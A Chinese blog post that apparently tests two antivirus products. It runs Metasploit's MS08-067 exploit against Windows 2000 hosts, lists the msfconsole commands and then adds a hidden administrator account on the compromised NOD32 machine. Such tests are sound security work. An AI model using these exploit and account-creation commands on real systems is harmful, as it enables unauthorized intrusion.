计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御
前言
媒体上关于系统漏洞的话题一直不断,在我所接触的用一些朋友和用户中虽然也知道打系统补丁很重要,但却又一直不以为然总以为网络上的危险离自己很远,大部份人都认为进行一次远程***很困难甚至认为只要安装了防病毒软件就一切大吉,是不是这样呢?让我们看看今天的操作。
主动防御技术通过微点推出后给现在的安全界注入了一针兴奋剂,现在各大厂商都宣传自己有了主动防御技术,而网络上针对它的宣传也是毁誉参半。 一切都以事实为主,有图有真相。
测试环境
Metasploit
操作系统:CentOS5
软件版本:framework-3.5.0-linux-i686.run
IP 地址:192.168.0.10
Metasploit(http://www.metasploit.com/framework/download/)是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为***测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。
微点主动防御软件
操作系统:Windows 2000 SP2
微点版本:2010-12-09
IP 地址:192.168.0.200
NOD32环境
操作系统:Windows 2000 SP2
软件版本:2010-12-09
IP 地址:192.168.0.100
操作步骤
搭建测试环境
按简介中的说明搭建相应的测试环境,保证三台机器都能相互通讯,有关实验环境的搭建方法可以参考利用单主机搭建和物理机器通讯的测试网络这篇文章。有关Metaspolit的安装方法网络上有很多,其方法也不复杂。
查看本地用户
在安装了微点主动防御软件的计算机上打开“用户管理”查看本地的所有用户。
对微点进行溢出***
登录到安装了Metasploit的系统,同时运行以下的命令启动到Metasploit程序,同时设定调用的溢出漏洞为MS08-067,远程主机为192.168.0.200,本地联接端口为5555,如下图所示。
msfconsole
use exploit/windows/smb/ms08_067_netapi
setPAYLOAD windows/shell/bind_tcp
setRHOST 192.168.0.200
setLPORT 5555
exploit
查看***结果(微点)
输入上述指令后,本地Metasploit会提示溢出结束但未能取得会话权限,而此时微点已检测到溢出***,同时还给出了远程***者的IP地址,证明安装微点主动防御软件后能有效防止溢出***。具体如下图所示。
对NOD32进行溢出***
登入Metasploit重新设定远程***的主机地址,因开始已指定了具体的溢出漏洞,这里只需要重新设定远程主机地址就可以了。具体指令及截图如下所示。
unset RHOST
setRHOST 192.168.0.100
show options
exploit
查看***结果(NOD32)
在输入上述指令后会提示已获取远程主机的管理权限,此时在远程管理会话中输入相关指令在计算机中新增用户并赋予其管理员权限,具体指令及截图如下所示。
netusertest 123 /add
net localgroup administrators test /add
测试远程添加的用户
为了检测溢出***的作用,打开“用户管理”界面时会发现已新增test用户,同时可以使用该用户登陆系统且拥有管理员权限,如下图所示。
后记
从上面的测试可以得知微点所宣传的防止溢出(漏洞)***确实是有效的。以下是关于该功能的描述。
“本发明涉及计算机缓冲区溢出***的检测方法,即,通过建立勾挂函数,检查线程所建立的堆栈帧的返回地址,并根据该返回地址判断是否发生缓冲区溢出,并在发现缓冲区溢出后,将引起该缓冲区溢出的线程结束。利用本发明的缓冲区溢出***的检测方法,不但可以高效、准确的检查出恶意程序的缓冲区溢出***,而且避免了现有技术中的杀毒软件对新生病毒特征代码获取的滞后性,和防火墙系统使用时的繁琐以及给计算机知识很少的用户带来的麻烦。即使对于新生的缓冲区溢出***的病毒、***也可以准确、高效的进行拦截。”
“申请(专利)号:200510007681.5”
声明
本文的目的绝不是为那些怀有不良动机的人提供支持,也不承担因为技术被滥用所产生的连带责任;本文的目的在到最在限度地唤起大家的网络安全意识,正视我们的网络世界所面临的一声危机,并采取行动。
计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御相关推荐
- 缓冲区溢出漏洞_缓冲区溢出漏洞简介
缓冲区溢出漏洞 重点 (Top highlight) 缓冲 (Buffer) A buffer is a temporary storage, usually present in the physi ...
- XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
目录标题 1.查看程序基本信息 2.反编译程序 3.攻击思路 (1)先利用功能2格式化字符串漏洞 (2)找到功能1的sub_400960()函数返回地址的位置 方法二 1.查看程序基本信息 Mary_ ...
- php crypt函数缓冲区溢出漏洞,简单缓冲区溢出漏洞攻击实验
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况.这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段.这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回 ...
- cve-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析
目录 0x00 前言 0x01 漏洞简介 0x02 环境搭建 0x03 漏洞利用 0x04 漏洞机理 1.POC验证 2.漏洞产生原理和攻击思路 3.payload构建 0x05 危害分析和处理建议 ...
- Kibana远程代码执行漏洞攻击方法和漏洞原理分析
漏洞简介 Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本.拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹she ...
- 简单漏洞QQ/TM2009 溢出漏洞
溢出代码:(中间汉字可任意替换) ﻬ墨♬ 漏洞范围:QQ/TM 2009 所有版本 代码最简易测试:请您加qq1246270967为好友试试 简易测试: 我们将qq214123212账号的昵称设 ...
- php组件缓冲区溢出漏洞,一个缓冲区溢出漏洞的简易教程
这篇文章类似于"傻瓜系列之利用缓冲区溢出".在这类漏洞中,我们的做法是利用网络,程序控制器,输入等等,发送超大的数据缓冲区给程序,覆盖程序内存的重要部分.在这些缓冲区覆盖程序内存之 ...
- mysql4.1.2缓冲区溢出漏洞_缓冲区溢出漏洞
缓冲区溢出就是在大缓冲区数据向小缓冲区复制的过程中,由于没有注意到小缓冲区的边界,"撑爆"了较小的缓冲区,从而冲掉了和小缓冲区相邻内存区域的其他数据而引起的内存问题.缓冲区溢出是常 ...
- php攻击方式及防御方法,Syn Flood 攻击 及其一般防御方法
防火墙通知受到Syn Flood攻击,并解释说: A SYN Flood is an attempt to consume memory and resources. A Normal TCP/IP ...
最新文章
- 墨奇科技汤林鹏:如何用 AI 技术颠覆指纹识别?
- WP7多国语言支持 from:http://blog.csdn.net/lee353086/article/details/6260676
- 什么是‘YTowOnt9‘?
- 【Python】序列通用操作
- 强化学习1——策略,价值函数,模型
- ubuntu16.04中安装tensflow教程
- POJ3320 Jessica's Reading Problem 尺取法
- VS Code 自动保存 码格式化
- ENTBOOST V2014.183 Linux发布,开源企业IM免费企业即时通讯
- LR11安装报错:此计算机上缺少vc2005_sp1_with_atl_fix_redist,请安装所有缺少的必要组件,然后重新运行此安装。
- 数学建模【SPSS 下载-安装、方差分析与回归分析的SPSS实现(软件概述、方差分析、回归分析)】
- 《Microsoft Word》进阶技巧:如何设置文档视图
- 机器学习 识别图片人物动作_一键学习人物识别说明
- 大调查:2018中国程序员真实薪资曝光,看看你达到平均水平了吗?
- 记一次windows 10启动报错 An operat ing system wasn‘t found. Try disconnecting any drives that don‘t con问题
- 解决Chrome 70版本以后谷歌不再信任赛门铁克证书问题
- new Set( ) 数组去重 适用场景
- 64匹马,8个赛道,找出跑得最快的4匹马(面试题详解)
- 用长微博工具发布长微博
- webStrom 和 eclipse项目已经重启报端口冲突解决
热门文章
- 17. django分页
- [PowerBI]两种方法计算每月或每季开发的新客户数量
- Curl 命令和用法
- 写一个简单的操作系统
- JS 根据后缀判断文件类型
- 文献 Application of deep learning tothe diagnosis of cervical lymph node metastasis from thyroid阅读笔记
- ubuntu16.04安装cajviewer(亲测有效)
- Financial Report财务报表设计软件安装与登录
- 社群人脉系统源码软件开发
- “汉芯”芯片涉嫌造假终于水落石出 造假属实